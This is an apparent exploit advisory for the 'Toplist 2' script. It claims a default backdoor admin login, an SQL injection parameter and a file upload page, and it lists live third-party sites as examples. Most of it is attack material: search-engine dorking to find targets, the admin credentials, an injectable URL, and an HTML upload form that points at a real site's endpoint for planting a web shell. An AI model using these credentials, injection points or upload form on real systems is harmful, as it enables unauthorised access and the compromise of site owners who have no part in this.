Toplist 2 SQL Injection / Backdoor Account / Shell Upload

Toplist 2 suffers from remote shell upload, backdoor account, and remote SQL injection vulnerabilities.


MD5 | 08a6531a217a4c307ef90f734313edb8

============================================================================
| # Title : toplist v 2 Backdoor account Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Version : v 2 |
| # Vendor : http://wmscripti.com |
| # Dork : n/a |
============================================================================

poc :

Application error message :

[+] Dorking Adegn Google Or Other Search Enggine

[+] user & pass = admin

[+] panel = yonetim

http://ww1.bahisindir.net/yonetim/

[+] upload ev!l after login from : upload/yukle.php

http://127.0.0.1/tekurmv1/upload/yukle.php

Sql injection :

http://toplist.sirinshell.com/topkat.php?url=sohbet-chat <===== inject her


Remote File Upload :

[+] Some sites have deleted the upload file so use this code ( note : use after login

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>

<form action="http://gazipasayalcinemlak.com/upload/yukle.php" method="post" enctype="multipart/form-data">


<div align="center">


<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td><b>Resmi Secin :</b></td>
<td>&nbsp;<input type="file" name="dosya" size="20"></td>
</tr>
<tr>
<td></td>
<td><br /><input type="submit" value="Yukle" style="width:220px;"></td>
</tr>
</table>


</div>

</form>


Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================

Related Posts